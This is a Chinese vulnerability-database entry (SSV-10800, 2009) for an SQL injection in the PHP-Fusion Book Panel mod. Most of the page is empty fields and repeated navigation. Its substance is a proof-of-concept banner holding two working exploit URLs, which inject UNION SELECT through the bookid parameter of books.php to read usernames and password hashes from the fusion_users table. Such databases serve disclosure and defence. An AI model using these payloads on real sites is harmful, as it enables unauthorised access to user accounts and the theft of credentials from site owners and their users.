PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

基本字段

漏洞编号：: SSV-10800

披露/发现时间：: 未知

提交时间：: 2009-03-11

漏洞等级：

漏洞类别：: SQL 注入

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.05KB

/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\ + + + |----------------------------------------------------------------| + + | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability | + + |----------------------------------------------------------------| + + + + [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-) + + + + |--------------------------------| + + | Author: elusiven from Poland ! | + + | Contact: elusivenpl@gmail.com | + + | Greetings: Fusi0n Group | + + |--------------------------------| + + + + Exploit: + + + + http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- + + http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users-- + + + \+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/ /join #wyjadacze on irc.quakenet.org

共 3 兑换

参考链接

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

发现/披露了漏洞
2009-03-11 提交了漏洞
2009-03-11 提交更新了 PoC

PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

PHP-Fusion Mod Book Panel (bookid) SQL Injection Vulnerability

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定